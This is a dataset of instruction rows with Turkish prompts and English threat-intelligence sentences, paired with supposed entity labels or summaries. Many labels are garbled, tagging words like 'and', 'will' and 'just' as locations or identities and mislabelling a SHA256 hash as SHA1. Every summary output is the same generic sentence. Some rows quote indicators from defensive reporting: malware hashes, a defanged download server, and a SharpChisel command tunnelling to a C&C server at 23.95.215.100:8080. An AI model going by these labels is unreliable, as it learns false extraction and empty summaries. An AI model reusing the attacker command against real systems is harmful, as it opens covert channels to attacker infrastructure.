instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We found that the additional config file is located in %PUBLIC%\Documents\sdcsvc.dat, and that the content should be encoded by base64.
FILEPATH: %PUBLIC%\Documents\sdcsvc.dat
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Here is a list of the C&C commands:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
x.TextContent.StartsWith("Review blocked sign-in attempt") || x.TextContent.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The Taomike library is called “zdtpay” and is a component of Taomike’s IAP system. Because Android apps are required to list the permissions they need in their manifest file, we can see that this library requires both SMS and network related permissions.
SOFTWARE: Taomike’s IAP system; SOFTWARE: Android; identity: Taomike
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe
malware: BIOPASS RAT; SHA2: 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe; FILEPATH: Silverlight_ins.exe; malware: Backdoor.Win32.BIOPASS.A
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The message box that decrypt.exe displays
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This is the user’s only chance to realize that opening this application is going to cost them dearly.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
On March 2, Volexity reported in-the-wild exploitation of the vulnerabilities, to which DEVCORE confirmed that the exploit observed by Volexity was the one submitted to MSRC.
TIME: March 2; identity: Volexity; identity: DEVCORE; identity: Volexity; identity: MSRC
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 12 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In one example, attackers impersonated McAfee.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.
malware: Pegasus; SOFTWARE: Android; SOFTWARE: Android
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and/or DOCs hosted on Google Drive and Microsoft One Drive.
location: and; attack-pattern: phishing; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The payload seems to be a product of extensive software engineering.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
June 13, 2021 596257ef017b02ba6961869d78a2317500a45f00c76682a22bbdbd3391857b5d upeg-system-app[.]com Likely repacked from Snaptube.
SHA2: 596257ef017b02ba6961869d78a2317500a45f00c76682a22bbdbd3391857b5d; location: Likely
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.
tools: vector; location: load
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It’s important to note, however, that since the malware is modular in nature, it can be easily recompiled to target any other device.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the early days of Window Vista, Microsoft enabled aggressive security checking to ensure user-initiated actions were legitimate.
SOFTWARE: Window Vista; identity: Microsoft
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Quick follow up analysis revealed that this mutex was also associated with the Allaple malware family.
malware: Allaple
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
But there was a twist: The group maintained that it would still make good on its "double extortion" threat to publish stolen data on its leak site.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We started tracking this particular campaign in 2018, and our analysis shows that it uses a fake executable decoy and a USB trojan strategy to steal information.
attack-pattern: USB trojan strategy; TIME: 2018
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.
attack-pattern: phishing; location: will
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Based on our observation, the quser command was used routinely throughout the attack to determine active remote sessions.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A third SharpChisel instance that connects to a different C&C server at 23.95.215.100:8080 is started via the following command: C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999 It is then configured with the following command line PowerShell command: powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999
attack-pattern: PowerShell
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When the security gaps on the network attack surface are exploited, it allows an attacker to perform spoofing, reconnaissance, automated data collection, and denial of service (DoS), affecting the control of an exposed system.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While we do not have any knowledge of who the actual Lazarus attackers are, the data collected from the backend systems gives us some insights into the internet usage patterns of systems likely owned by Lazarus group members.
malware: Lazarus; location: are; location: likely
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We discovered a malware family called Maikspy — a multi-platform spyware that can steal users’ private data.
malware: Maikspy
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.
malware: HYPERSCRAPE; malware: Telegram grabber tool; identity: PWC’
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We discovered a potential targeted attack that makes use of legitimate script engine AutoHotkey, in combination with malicious script files.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
To learn more about overlooked risks associated with supply chain and smart factories, read our expert team's proof of concept paper, "Forward-looking security analysis of smart factories".
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This malware sample will also dynamically load a number of functions and libraries.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.
identity: TAG
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Aside from acting as a C&C and distributing Bahamut-like malware, some of these websites also serve as the host for other malicious documents.
threat-actor: Bahamut
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
However, while the original way of obtaining the class loader and exploiting it no longer works, a new feature of JDK was introduced in version 9, providing another way to obtain the class loader and making the exploit possible again.
SOFTWARE: JDK
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We will also continue to share more detailed analysis of vulnerabilities we find, phishing and malware campaigns that we see, and other interesting or noteworthy trends across this space.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Several western governments have proposed broad recommendations focused on technical hygiene.
identity: western governments
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.
location: long; location: target; attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Such gangs obtain their foothold in the networks of their victims by purchasing access from other threat actors, who sell it as a commodity.
attack-pattern: purchasing access
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This confirms that this threat actor is abusing this legitimate program to sideload its backdoors.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Cloud computing is on a roll.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 15 YouTube channels as part of our investigation into coordinated influence operations linked to Ethiopia.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Encryption key using blowfish
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Though the fact that the malware writer obviously named the mutex by rolling their face on the keyboard made it obvious before we'd done any further analysis that we’d found a unique identifier within the binaries.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.
location: security; attack-pattern: phishing; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The BIOPASS RAT malware registers three custom Socket.io event handlers:
malware: BIOPASS RAT
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At this time, we do not have research that explains definitively how the Shamoon 2 attackers have obtained these credentials.
threat-actor: Shamoon 2
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These were published on Google Play — but have since been taken down — and third-party app marketplaces.
SOFTWARE: Google Play
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Reports differ on whether this is delivered through social engineering that convinces the user to install the fake update or if it is delivered silently through unpatched vulnerabilities (i.e. “drive-by” installs). Lateral Movement
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Security as code allows DevOps teams to bake security into their build pipeline to release continuously and frequently, so developers like yourself, can keep working without disruption from security.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The config files have a similar, custom structure, and both groups have infrastructure overlap.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The bottom line is that security takes a village.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Troj.Win32.TRX.XXPE50FFF039 b61e0f68772f3557024325f3a05e4edb940dbbe380af00f3bdaaaeabda308e72 igmtSX.exe
SHA1: b61e0f68772f3557024325f3a05e4edb940dbbe380af00f3bdaaaeabda308e72
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The component responsible for managing the C&C server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Persistence
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Deflect company intrusions through InfoSec education.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Background on Exploitation of the Class Loader Establishing a Reverse Shell Connection to a Remote Server on the Compromised Server SpringShell Exploit Observed in the Wild Conclusion
vulnerability: SpringShell; attack-pattern: Establishing a Reverse Shell Connection
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This RAT’s code is based on leaked Gh0st RAT source code; however, its traffic encryption is customized and it added some new features, like QQ number theft.
malware: RAT; malware: Gh0st RAT
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These email addresses were used for spear phishing, prompting potential victim organizations to open the attachments with malware payloads.
attack-pattern: spear phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This spike is largely due to blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.
threat-actor: APT28; threat-actor: Fancy Bear; location: Russian
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Therefore, exploits for this vulnerability have potential to be of high impact.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the attack, as detailed in the Palo Alto Networks Security Operations blog, “Protecting Against the Bronze Bit Vulnerability with Cortex XDR,” the attacker tampers with the Kerberos service ticket, which allows the attacker to authenticate to the target as any user, including sensitive accounts and members of the “Protected Users” group.
vulnerability: Bronze Bit Vulnerability; SOFTWARE: Cortex XDR; SOFTWARE: Kerberos; identity: Palo Alto Networks Security Operations
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This is also why, after more than two years, there are still live VPNFilter hosts out there.
malware: VPNFilter
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.
location: and; attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
They could be patriotic hackers, they could just be guns for hire or cyber guns for hire, so to speak.
identity: just
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Across the changing landscape of botnet herders, Banking Trojans, ransomware and coin mining is one constant: the business-savvy drive to maximize profit and reduce risk.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
And many smart speakers have digital home assistants built into them, making the distinction even less clear.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
An extra component has been added to its sections.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Fig - Microsoft Exchange Server Possible ASPX Web Shell The above model triggers when a new web shell is created.
vulnerability: Microsoft Exchange Server Possible ASPX Web Shell
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.
SOFTWARE: Gmail
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
b. The operating system on the device: Some devices don’t have an operating system separate from the firmware, but many do.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
hxxp://207[.]148[.]94[.]157/aio.exe hxxp://207[.]148[.]94[.]157/smb.exe hxxp://207[.]148[.]94[.]157/m.ex_ hxxp://207[.]148[.]94[.]157/w hxxp://207[.]148[.]94[.]157/Web.ex_
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The specificity of their targets stems from the social engineering tactics used.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
By looking at the digital fingerprints of these phishing sites and comparing them with a large data set that spans almost five years, we can uniquely relate them to a couple of Pawn Storm incidents in 2016 and 2017.
attack-pattern: phishing; location: sites; location: and; location: them; location: large; location: can; location: them; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Within these files is a link to an attacker controlled phishing domain.
attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
MSIL.SUNBURST.A 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 76640508b1e7759e548771a5359eaed353bf1eec
SHA1: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77; SHA1: 76640508b1e7759e548771a5359eaed353bf1eec
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction A Closer Look
identity: Palo Alto Networks; threat-actor: DEV-0537
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In short, it’s the digital equivalent of those physical skimming devices that criminals insert into ATMs to steal card data as it’s entered: it’s highly effective and happens completely without the knowledge of the cardholder.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Without knowing the traffic between SmileSvr and C&C server, we could not fully understand all functions.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Delivered as part of its industry-leading platform, Cloud One – Application Security provides code-level visibility and protection against the latest cyber threats.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Avoid clicking on links that you get in email.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Organizations should block access to the following domains to prevent Filmkan from receiving updates from the attacker.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The following image shows an assembly module property that was generated for this sample.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Apps that use earlier versions of the library appear to be safe.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Here are some of the X-Mailers we observed:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We also checked the registrant data of the domains used by the attacker.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.
malware: stealer; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Malicious update files are prepared, signed with the stolen certificate, and uploaded to the attacker’s server (207[.]148[.]94[.]157).
location: are; location: and; IPV4: 207[.]148[.]94[.]157
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC
malware: Koadic
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
After downloading the payload, it removes the quarantine attribute of the file to bypass Gatekeeper.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
They also conduct corporate espionage, handily obscuring their clients’ role.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The lure document redirected from the phishing page that discusses Indian and Pakistani political map issues Figure 10
location: lure; attack-pattern: phishing; location: page; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The many similarities between these exploits lead us to believe they were written by the same actor or group.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Nothing spoils a new gadget more than having some kind of security or privacy problem related to it.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Users were instructed to activate an invitation to a (fake) webinar by logging in.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Taomike has not previously been associated with malicious activity, but a recent update to their software added SMS theft functionality.
identity: Taomike
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
One console with one source of prioritized, optimized alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.